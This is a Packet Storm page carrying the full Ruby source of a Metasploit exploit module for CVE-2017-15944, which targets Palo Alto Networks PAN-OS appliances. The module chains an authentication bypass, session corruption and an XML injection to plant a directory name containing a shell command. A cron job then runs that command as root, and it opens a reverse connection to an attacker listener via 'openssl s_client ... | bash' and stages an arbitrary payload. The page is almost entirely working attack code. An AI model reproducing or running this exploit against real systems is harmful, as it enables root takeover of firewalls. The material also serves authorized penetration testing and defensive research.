This Metasploit module exploits a chain of vulnerabilities in Palo Alto Networks products running PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using an authentication bypass flaw to to exploit an XML injection issue, which is then abused to create an arbitrary directory, and finally gains root code execution by exploiting a vulnerable cron script. This Metasploit module uses an initial reverse TLS callback to stage arbitrary payloads on the target appliance. The cron job used for the final payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
f9f9ce5b8abd0f8306e641f3db279345c840570cf53ebfcf9179efb66f27a90f##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Palo Alto Networks readSessionVarsFromFile() Session Corruption',
'Description' => %q{
This module exploits a chain of vulnerabilities in Palo Alto Networks products running
PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using
an authentication bypass flaw to to exploit an XML injection issue, which is then
abused to create an arbitrary directory, and finally gains root code execution by
exploiting a vulnerable cron script. This module uses an initial reverse TLS callback
to stage arbitrary payloads on the target appliance. The cron job used for the final
payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
},
'Author' => [
'Philip Pettersson <philip.pettersson[at]gmail com>', # Vulnerability discovery
'hdm' # Metasploit module
],
'References' => [
['CVE', '2017-15944'],
['URL', 'http://seclists.org/fulldisclosure/2017/Dec/38'],
['BID', '102079'],
],
'DisclosureDate' => 'Dec 11 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {'BadChars' => '', 'Space' => 8000, 'DisableNops' => true},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 2}
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
])
end
def exploit
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Set the base directory and the staging payload directory path name
base_directory = "/opt/pancfg/mgmt/logdb/traffic/1/"
command_payload = "* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ; "
target_directory = base_directory + command_payload
if target_directory.length > 255
print_error("The selected payload or options resulted in an encoded command that is too long (255+ bytes)")
return
end
dev_str_1 = Rex::Text.rand_text_alpha_lower(1+rand(10))
dev_str_2 = Rex::Text.rand_text_alpha_lower(1+rand(10))
user_id = rand(2000).to_s
print_status("Creating our corrupted session ID...")
# Obtain a session cookie linked to a corrupted session file. A raw request
# is needed to prevent encoding of the parameters injected into the session
res = send_request_raw(
'method' => 'GET',
'uri' => "/esp/cms_changeDeviceContext.esp?device=#{dev_str_1}:#{dev_str_2}%27\";user|s.\"#{user_id}\";"
)
unless res && res.body.to_s.index('@start@Success@end@')
print_error("Unexpected response when creating the corrupted session cookie: #{res.code} #{res.message}")
return
end
cookies = res.get_cookies
unless cookies =~ /PHPSESSID=([a-fA-F0-9]+)/
print_error("Unexpected cookie response when creating the corrupted session cookie: #{res.code} #{res.message} #{cookies}")
return
end
create_directory_tid = 1 + rand(1000)
create_directory_json = JSON.dump({
"action" => "PanDirect",
"method" => "execute",
"data" => [
Rex::Text.md5(create_directory_tid.to_s),
"Administrator.get",
{
"changeMyPassword" => true,
"template" => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
"id" => "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../..#{target_directory}'/>\x00"
}
],
"type" => "rpc",
"tid" => create_directory_tid
})
print_status("Calling Administrator.get to create directory under #{base_directory}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => '/php/utils/router.php/Administrator.get',
'cookie' => cookies,
'ctype' => "application/json",
'data' => create_directory_json
)
unless res && res.body.to_s.index('Async request enqueued')
print_error("Unexpected response when calling Administrator.get method: #{res.code} #{res.message}")
return
end
register_dirs_for_cleanup(base_directory)
print_status("Waiting up to 20 minutes for the cronjob to fire and execute...")
expiry = Time.at(Time.now.to_i + (60*20)).to_i
last_notice = 0
while expiry > Time.now.to_i && ! session_created?
if last_notice + 30 < Time.now.to_i
print_status("Waiting for a session, #{expiry - Time.now.to_i} seconds left...")
last_notice = Time.now.to_i
end
sleep(1)
end
unless session_created?
print_error("No connection received from the target, giving up.")
end
end
def stage_real_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => true,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
self.service.on_client_connect_proc = Proc.new { |client|
stage_real_payload(client)
}
# Start the listening service
self.service.start
end
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.kind_of?(Rex::Service)
if self.service.kind_of?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::SocketError
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed